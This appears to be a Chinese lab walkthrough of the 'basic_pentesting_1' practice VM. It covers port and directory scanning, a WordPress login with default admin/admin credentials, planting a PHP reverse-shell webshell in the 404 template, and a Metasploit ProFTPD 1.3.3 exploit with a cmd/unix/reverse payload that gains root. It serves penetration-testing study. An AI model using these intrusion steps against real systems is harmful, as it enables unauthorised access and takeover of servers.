靶机来源-basic_pentesting_1【VX订阅号:0x00实验室】

发布时间:2024年01月17日

basic_pentesting_1【VX订阅号:0x00实验室】

arp-scan扫描靶机IP

masscan 192.168.253.153 --ports 0-65535 --rate=10000端口扫描

nmap扫描nmap -T5 -A -p- 192.168.253.153
21:ProFTPD 1.3.3

dirb http://192.168.253.153 目录扫描

http://192.168.253.153/secret/发现网站cms是wordpress

wpscan --url http://192.168.253.153/secret/

知道版本WordPress 4.9.24
msf没发现可利用漏洞
wpscan --url http://192.168.253.153/secret/ --enumerate u用户名枚举

admin/admin直接进来了
404界面写入phpshell
shell:反弹的phpwebshellphp-reverse-shell.php 默认目录及文件名/usr/share/webshells/php


把IP和port改成自己的,监听反弹
404监听不行,监听不到
WordPress 6.4.1
上传可以
在上传路径找到自己上传文件

换个方法
ftp端口开着
ProFTPD
搜索可利用模块search ProFTPD 1.3.3

设置payload,输入set payload cmd/unix/reverse、

设置目的地址和源地址

运行

获得root权限

文章来源:https://blog.csdn.net/qq_44796547/article/details/135616906
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。